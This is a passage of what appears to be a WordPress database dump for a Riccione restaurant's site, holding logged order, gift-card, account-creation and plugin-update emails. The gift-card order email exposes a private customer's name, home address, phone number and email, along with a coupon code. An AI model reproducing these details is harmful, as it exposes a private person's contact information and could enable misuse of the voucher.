15:30:24','2020-12-24 14:30:24','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-prenotazione-da-nuovo-cliente-3687-24-december-2020/',0,'postman_sent_mail','',0),(3689,0,'2020-12-24 15:30:27','2020-12-24 14:30:27','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Thank you for your order</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi Elena,</p>\n<p style=\"margin: 0 0 16px\">Just to let you know — we\'ve received your order #3687, and it is now being processed:</p>\n\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	[Order #3687] (24 December 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Buono Regalo (valore a scelta)<ul class=\"wc-item-meta\" style=\"font-size: small;margin: 1em 0 0;padding: 0\">\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">To:</strong> <p style=\"margin: 0\"><a href=\"mailto:c.lorenzetti@inwind.it\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">c.lorenzetti@inwind.it</a></p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">From:</strong> <p style=\"margin: 0\">Elena e Piero</p>\n</li>\n<li style=\"margin: 0.5em 0 0;padding: 0\">\n<strong class=\"wc-item-meta-label\" style=\"float: left;margin-right: .25em;clear: both\">Message:</strong> <p style=\"margin: 0\">Tantissimi Auguri di Buone Feste con una piacevole cena per un momemto di relax...</p>\n</li>\n</ul>		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n			<tr>\n			<td colspan=\"3\" style=\"padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n				<p style=\"margin: 0 0 16px\">Validità 6 mesi dal momento dell\'acquisto</p>\n			</td>\n		</tr>\n		\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n							</tfoot>\n	</table>\n</div>\n\n\n<table id=\"addresses\" cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;vertical-align: top;margin-bottom: 40px;padding: 0\">\n	<tr>\n		<td valign=\"top\" width=\"50%\" style=\"text-align: left;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif;border: 0;padding: 0\">\n			<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>Billing address</h2>\n\n			<address class=\"address\" style=\"padding: 12px;color: #737373;border: 1px solid #e4e4e4\">\n				Elena Valentini<br>Via Napoli 19<br>47838<br>Riccione<br>RIMINI									<br><a href=\"tel:3382950071\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">3382950071</a>													<br>c.lorenzetti@inwind.it							</address>\n		</td>\n			</tr>\n</table>\n<p style=\"margin: 0 0 16px\">Thanks for using www.ristorantesolymar.it!</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar order has been received!','','private','closed','closed','','your-sol-y-mar-order-has-been-received-2','','','2020-12-24 15:30:27','2020-12-24 14:30:27','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-order-has-been-received-2/',0,'postman_sent_mail','',0),(3690,0,'2020-12-24 15:30:27','2020-12-24 14:30:27','GIFTCARD ORDER #3687','solymarcouponW1FGS','GIFTCARD ORDER #3687','publish','closed','closed','','solymarcouponw1fgs','','','2020-12-24 15:30:27','2020-12-24 14:30:27','',0,'https://www.ristorantesolymar.it/2020/12/24/solymarcouponw1fgs/',0,'shop_coupon','',0),(3691,0,'2020-12-24 15:30:32','2020-12-24 14:30:32','\n\n\n\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"margin: 0 auto;background-color: #ff9898;border-spacing: 10px\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 5px\">\r\n<table class=\"email-container\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: 0 auto;width: 100%;padding: 10px 0px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px 0;text-align: left\"><a style=\"font-weight: normal;text-decoration: none;color: #ffffff;margin-left: 10px\"><img src=\"http://www.ristorantesolymar.it/wp-content/uploads/2017/07/sol-y-mar-logo-150.png\" width=\"200px\" height=\"150px\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></a></td>\r\n<td style=\"padding: 10px 0;text-align: center\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/07/buono.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n<tr>\r\n<td class=\"img-block\" style=\"text-align: center;padding: 2px 0px\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n \r\n<table class=\"email-container\" border=\"0\" width=\"600px;\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;margin: auto\">\r\n<tbody>\r\n<tr>\r\n<td bgcolor=\"#ffffff\" style=\"text-align: center;font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555\"></td>\r\n</tr>\r\n<!-- -->\r\n<tr>\r\n<td align=\"center\" valign=\"top\" bgcolor=\"#ffffff\" style=\"padding: 15px\">\r\n<table border=\"0\" width=\"100%;\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top;width: 50%\">\r\n<table border=\"0\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 10px;text-align: center;width: 50%\"><img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2017/12/regala-un-coupon.png\" width=\"100%\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n<td class=\"stack-column-center\" style=\"vertical-align: top\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" style=\"background-color: #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td class=\"center-on-narrow\" style=\"font-family: sans-serif;font-size: 15px;line-height: 20px;color: #555555;padding: 10px;text-align: left\">\r\n<p style=\"min-height: 180px\">Tantissimi Auguri di Buone Feste con una piacevole cena per un momemto di relax...</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 0 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">Da :</span><span style=\"width: 75%;float: left\">Elena e Piero</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\n<span style=\"float: left;padding: 0 3% 0 0;text-align: right\">A :</span><span style=\"width: 75%;float: left\">c.lorenzetti@inwind.it</span>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 5px 10px;color: #373737\">\r\n<h3 style=\"color: #557da1;font-weight: bold;line-height: 130%;margin: 16px 0 8px;text-align: left;font-size: 30px;font-family: Arial, Helvetica, sans-serif\"><span class=\"woocommerce-Price-amount amount\">100,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></h3>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td valign=\"middle\" style=\"text-align: center;background-color: #ffd5d5;padding: 10px\">\r\n<div>\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" style=\"background-color: #ffffff;border-spacing: 20px;border: 2px dashed #ffffff\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"middle\" style=\"padding: 10px 0px;font-family: sans-serif;line-height: 20px;color: #ff9898;text-align: center;border: 3px\">\r\n<h2 style=\"color: #557da1;font-weight: bold;line-height: 130%;padding: 0px;margin: 10px 0px;font-family: Arial, Helvetica, sans-serif;font-size: 15px;text-align: center\">Codice Coupon</h2>\r\n<p style=\"font-size: 25px;font-weight: bold;margin: 0px;text-align: center\"><img class=\"mwb_wgm_coupon_img\" id=\"1608820227www.ristorantesolymar.it\" src=\"https://www.ristorantesolymar.it/wp-content/uploads/qrcode_barcode/mwb__1608820227solymarcouponW1FGS.png\" style=\"border: none;font-size: 14px;font-weight: bold;height: auto;text-decoration: none;text-transform: capitalize;vertical-align: middle;margin-right: 10px;max-width: 100%\"></p>\r\n<span style=\"font-size: 15px;text-align: center;padding: 10px 0px\">(Scadenza. 22/06/2021)</span>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"text-align: center;padding: 15px;color: #ffffff;background-color: #ff9898;font-size: 18px;font-family: Arial, Helvetica, sans-serif\">Trovi il regolamento dell\'utilizzo dei Coupon / Buoni regali sul <a href=\"https://www.ristorantesolymar.it/info-privacy/\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">sito</a>\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\n\n\n','Sol Y Mar','','private','closed','closed','','sol-y-mar-3','','','2020-12-24 15:30:32','2020-12-24 14:30:32','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-3/',0,'postman_sent_mail','',0),(3693,0,'2020-12-31 16:44:28','2020-12-31 15:44:28','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi jdydpehffrf,</p>\n<p style=\"margin: 0 0 16px\">Thanks for creating an account on Sol Y Mar. Your username is <strong>jdydpehffrf</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar account has been created!','Sent ( ** Fallback ** )','private','closed','closed','','your-sol-y-mar-account-has-been-created-2','','','2020-12-31 16:44:28','2020-12-31 15:44:28','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-account-has-been-created-2/',0,'postman_sent_mail','',0),(3694,0,'2021-01-01 12:45:46','2021-01-01 11:45:46','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi lupswrgooxz,</p>\n<p style=\"margin: 0 0 16px\">Thanks for creating an account on Sol Y Mar. Your username is <strong>lupswrgooxz</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar account has been created!','Incorrect authentication data\r\n','private','closed','closed','','your-sol-y-mar-account-has-been-created-3','','','2021-01-01 12:45:46','2021-01-01 11:45:46','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-account-has-been-created-3/',0,'postman_sent_mail','',0),(3695,0,'2021-01-01 12:45:46','2021-01-01 11:45:46','\n\n	\n		\n		<title>Sol Y Mar</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Welcome to Sol Y Mar</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">Hi lupswrgooxz,</p>\n<p style=\"margin: 0 0 16px\">Thanks for creating an account on Sol Y Mar. Your username is <strong>lupswrgooxz</strong>. You can access your account area to view orders, change your password, and more at: <a href=\"https://www.ristorantesolymar.it/mio-account/\" rel=\"nofollow\" style=\"color: #557da1;font-weight: normal;text-decoration: underline\">https://www.ristorantesolymar.it/mio-account/</a></p>\n\n<p style=\"margin: 0 0 16px\">We look forward to seeing you soon.</p>\n															</div>\n														</td>\n													</tr>\n												</table>\n												<!-- End Content -->\n											</td>\n										</tr>\n									</table>\n									<!-- End Body -->\n								</td>\n							</tr>\n						</table>\n					</td>\n				</tr>\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<!-- Footer -->\n						<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"600\" id=\"template_footer\">\n							<tr>\n								<td valign=\"top\" style=\"padding: 0;border-radius: 6px\">\n									<table border=\"0\" cellpadding=\"10\" cellspacing=\"0\" width=\"100%\">\n										<tr>\n											<td colspan=\"2\" valign=\"middle\" id=\"credit\" style=\'border-radius: 6px;border: 0;color: #969696;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 12px;line-height: 150%;text-align: center;padding: 24px 0\'>\n												<p style=\"margin: 0 0 16px\">Sol Y Mar, ristorante a Riccione</p>\n											</td>\n										</tr>\n									</table>\n								</td>\n							</tr>\n						</table>\n						<!-- End Footer -->\n					</td>\n				</tr>\n			</table>\n		</div>\n	\n\n','Your Sol Y Mar account has been created!','Sent ( ** Fallback ** )','private','closed','closed','','your-sol-y-mar-account-has-been-created-4','','','2021-01-01 12:45:46','2021-01-01 11:45:46','',0,'https://www.ristorantesolymar.it/postman_sent_mail/your-sol-y-mar-account-has-been-created-4/',0,'postman_sent_mail','',0),(3697,0,'2021-01-05 01:29:09','2021-01-05 00:29:09','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- UpdraftPlus - Backup/Restore (from version 1.16.43 to 1.16.45)\n- WP Fastest Cache (from version 0.9.1.3 to 0.9.1.4)\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-some-plugins-were-automatically-updated-17','','','2021-01-05 01:29:09','2021-01-05 00:29:09','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-some-plugins-were-automatically-updated-17/',0,'postman_sent_mail','',0),(1693,1,'2018-08-20 10:25:47','2018-08-20 10:25:47','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Nouveau dessert exotique','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','nouveau-dessert-exotique','','','2018-08-20 10:25:47','2018-08-20 